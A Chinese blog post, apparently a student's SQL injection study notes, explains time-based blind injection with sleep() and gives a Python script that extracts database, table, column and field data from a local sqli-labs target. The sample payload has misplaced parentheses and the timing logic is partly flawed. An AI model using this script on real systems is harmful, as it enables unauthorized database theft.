上次说到了sql注入中的基于报错盲注的基本的方法。

关于sql注入学习记录(4)

今天说一说报错盲注

基于时间延时的SQL盲注

  • 使用时间延时注入的场景:
    1.不能使用union select 联合查询方式注入
    2.有些网站没有回显,只能通过延时判断

基于时间延时的SQL盲注的方法:

  • IF表达式
    IF(expr1,expr2,expr3)
    expr1 的值为 TRUE,则返回值为 expr2
    expr1 的值为FALSE,则返回值为 expr3
  • sleep表达式
    sleep(5)表示延迟5秒
  • benchmark表达式
    benchmark是Mysql的一个内置函数,其作用是来测试一些函数的执行速度。
    BENCHMARK(10000,md5('a'))表示执行md5('a')10000次

使用sleep()语句

payload:
?id=1and if(ascii(substr(database()),1,1))=115,sleep(5),1)--+
如果数据库名的第一个字符的ascii值为115,则延时5秒
其他原理和布尔盲注差不多,无非多了if和sleep,我将布尔盲注的python脚本做了一点修改贴在下面参考(其实也改了一个多小时,我好菜)

import requests
from time import time
url = 'http://127.0.0.1/sqli/Less-5/?id=1'


'''
# 爆数据库长度
'''
startTime = time()
for i in range(100):
    a = requests.get(url + "'and if(length(database())=" + str(i) + ",sleep(5),1)" + '%23')
    if time()-startTime > 5:
        length = i
        print('数据库长度为:%s' % length)
        break

'''
爆数据库名
'''
startTime = time()
j = []
print('数据库名:', end='')
for i in range(1, length + 1):
    for k in range(ord('0'), ord('z') + 1):
        b = requests.get(url + "'and if(left(database(),%d)='%s',sleep(5),1)%%23" % (i, ''.join(j) + chr(k)))
        if time()-startTime > 5:
            j.append(chr(k))
            print(chr(k), end='')
            startTime = time()
            break
print('\n')

'''
爆表名
'''
startTime = time()
i = 0
while 1:
    j = 1
    while 1:
        for k in range(ord('0'), ord('z') + 2):
            count = 0   # 上锁
            c = requests.get(url + "'and if(ascii(substr((select table_name from information_schema.tables where "
                                   "table_schema=database() limit %d,1),%d,1))=%d,sleep(5),1)--+" % (i, j, k))
            if time()-startTime > 5:
                count = count + 1  # 匹配到就+1解锁,否则count为0爆下一个表
                j += 1
                print(chr(k), end='')
                startTime = time()
                break
        if count == 0:
            print()
            startTime = time()
            break
    i += 1
    if j == 1:
        break

'''
 爆列名
'''

table = input('请输入表名:')
startTime = time()
i = 0
while 1:
    j = 1
    while 1:
        for k in range(ord('0'), ord('z') + 1):
            count = 0  # 上锁
            c = requests.get(url + "'and if(ascii(substr((select column_name from information_schema.columns where "
                                   "table_name='%s' limit %d,1),%d,1))=%d,sleep(5),1)--+" % (table, i, j, k))
            if time()-startTime > 5:
                count = count + 1
                j += 1
                print(chr(k), end='')
                startTime = time()
                break
        if count == 0:
            print('\t')
            startTime = time()
            break
    i += 1
    if j == 1:
        break

'''
爆字段
'''
column = input('请输入列名:')
startTime = time()
i = 0
while 1:
    j = 1
    while 1:
        for k in range(ord('0'), ord('z') + 1):
            count = 0
            c = requests.get(
                url + "'and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d,sleep(5),1)--+" % (column, table, i, j, k))
            if time()-startTime > 5:
                count = count + 1
                j += 1
                print(chr(k), end='')
                startTime = time()
                break
        if count == 0:
            print('\t')
            break
    i += 1
    if j == 1:
        break

写脚本的时候发现了一种方法用count来表示某个循环是否执行了if或某个函数,和操作系统中学的上锁差不多,不知道是不是这个意思,暂时就这么记录在这。

使用benchmark()语句

  • 和sleep差不多,懒得写了。
本文作者:Author:     文章标题:sql注入学习记录(5)-基于时间延迟的SQL盲注
本文地址:https://yuaneuro.cn/archives/86.html     
版权说明:若无注明,本文皆为“yuaneuro的小站”原创,转载请保留文章出处。
Last modification:April 8th, 2020 at 02:11 am